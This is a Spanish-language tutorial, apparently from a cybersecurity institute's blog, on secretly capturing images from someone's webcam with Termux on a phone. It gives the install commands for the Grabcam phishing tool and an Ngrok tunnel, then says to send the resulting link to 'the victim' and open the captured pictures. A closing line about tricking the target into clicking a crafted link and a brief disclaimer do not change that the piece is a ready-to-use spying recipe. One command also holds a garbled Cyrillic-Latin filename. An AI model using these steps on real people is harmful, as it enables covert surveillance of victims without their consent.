Muchos usuarios aún ignoran que es posible explotar al máximo las capacidades de su smartphone con solo unas ligeras modificaciones. En esta ocasión, los expertos en seguridad móvil del Instituto Internacional de Seguridad Cibernética (IICS) le mostrarán cómo hackear una cámara web desde su smartphone usando Termux.
Para ello, utilizaremos un par de herramientas: Grabcam, una herramienta para hackear cámaras conectadas a Internet a través de una página web; y Ngrok, una plataforma que, utilizando la utilidad instalada, le permite organizar el acceso remoto a un servidor web o algún otro servicio que se ejecute en una PC.
Acorde a los expertos en seguridad móvil, lo primero que debemos hacer es descargar los recursos necesarios empleando los comandos enlistados a continuación.
Instalar Grabcam:
apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install wget -y
pip install lolcat
pkg install git -y
git clone https://github.com/noob-hackers/grabcam
cd grabcam
chmod +x grabcam.sh
bash grabcam.sh
Ahora abra una nueva sesión para completar la instalación de ngrok:
pkg update && pkg upgrade
pkg install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
Luego vaya a la configuración del teléfono, encienda su Internet móvil y distribuya WiFi. Al volver a Termux, seleccione el elemento Ngrok, copie el enlace resultante y envíelo a la víctima. Para ver las imágenes, solo ingrese:
ls
termux-open camназваниевашейкартинки.png
Con esto concluye el tutorial. Como muchos usuarios habrán notado, la herramienta es similar a SAYHELLO, aunque siempre es bueno contar con otras opciones. Además de estas herramientas, recuerde que debe hacer que el usuario objetivo haga clic en un enlace especialmente diseñado, aunque este es un tema para otra ocasión.
Como de costumbre, le recordamos que este material fue elaborado con fines exclusivamente informativos, por lo que IICS no se hace responsable del mal uso que pueda darse a estas herramientas.
Para conocer más sobre riesgos de seguridad informática, seguridad móvil, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).
Entusiasta de la seguridad cibernética. Especialista en seguridad de la información, actualmente trabajando como especialista en infraestructura de riesgos e investigador.
Experiencia en procesos de riesgo y control, soporte de auditoría de seguridad, diseño y soporte de COB (continuidad del negocio), gestión de grupos de trabajo y estándares de seguridad de la información.